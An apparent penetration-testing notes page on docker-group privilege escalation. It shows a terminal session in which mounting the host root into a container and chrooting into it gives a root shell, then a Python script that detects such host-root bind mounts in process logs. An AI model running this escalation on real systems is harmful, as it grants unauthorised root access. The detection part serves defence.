Docker

The docker binary is the CLI for interacting with the Docker daemon, which manages containers on the host system. It enables operations such as running, building, inspecting, and managing containers and images. If accessible to a non-root user, it often indicates that the user belongs to the docker group, which effectively grants root-equivalent privileges.

This is because the Docker daemon runs as root, and containers can be configured to mount the host filesystem, execute binaries with elevated privileges, or escape into the host environment entirely. In offensive security scenarios, access to the docker binary is a high-value target for privilege escalation. It allows spawning containers with mapped volumes, executing custom payloads, or even directly gaining a root shell on the host through intentional container abuse. In the session below, the alpine image is not available locally and the pull is interrupted, so the postgres image already present on the host is used instead; the host root is mounted at /mnt and chroot into it yields a root shell.

x7331@kali:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
^C

x7331@kali:~$ docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
postgres            latest              adf2b126dda8        5 years ago         313MB

x7331@kali:~$ docker run -v /:/mnt --rm -it postgres chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)
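
For detection, the host-root bind mount in the session above can be flagged from process-execution logs. The following is an added example, not part of the original page: the log format (user, tab, command line), the sample lines and the function names are assumptions made for illustration. It scans every token, so a container command that itself contains -v can produce a false positive.

```python
import posixpath
import shlex

# Constructed process-execution log lines ("user<TAB>command line"); not from the page.
SAMPLE_EXEC_LOG = (
    "x7331\tdocker run -v /:/mnt --rm -it postgres chroot /mnt sh\n"
    "deploy\tdocker run -d -v /srv/app/data:/data postgres\n"
    "ci\tdocker run --mount type=bind,source=/,target=/host alpine ls /host\n"
    "ops\tdocker run --rm --volume=/var/log:/logs:ro alpine tail /logs/syslog\n"
    "dev\tdocker run -v pgdata:/var/lib/postgresql/data postgres\n"
)

def host_bind_sources(argv):
    """Host paths bind-mounted via -v/--volume/--mount in a docker argv."""
    sources = []
    for i, arg in enumerate(argv):
        flag, sep, value = arg.partition("=")
        if flag not in ("-v", "--volume", "--mount"):
            continue
        if not sep:  # value is the next token, as in "-v /:/mnt"
            value = argv[i + 1] if i + 1 < len(argv) else ""
        if flag == "--mount":
            opts = dict(kv.partition("=")[::2] for kv in value.split(","))
            if opts.get("type") != "bind":
                continue
            src = opts.get("source") or opts.get("src") or ""
        else:
            src, colon, _ = value.partition(":")
            if not colon:  # "-v /data" is an anonymous volume, not a host path
                continue
        if src.startswith("/"):  # named volumes do not start with "/"
            # Normalise so "//" or "/mnt/.." are also recognised as "/".
            sources.append("/" + posixpath.normpath(src).lstrip("/"))
    return sources

def find_host_root_mounts(log_text):
    """Return (user, command) for each docker invocation that bind-mounts host /."""
    hits = []
    for line in log_text.splitlines():
        user, _, cmdline = line.partition("\t")
        try:
            argv = shlex.split(cmdline)
        except ValueError:  # unbalanced quotes in a logged command line
            continue
        if argv and posixpath.basename(argv[0]) == "docker" and "/" in host_bind_sources(argv):
            hits.append((user, cmdline))
    return hits

if __name__ == "__main__":
    for user, cmdline in find_host_root_mounts(SAMPLE_EXEC_LOG):
        print(f"ALERT host root bind-mounted by {user}: {cmdline}")
```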
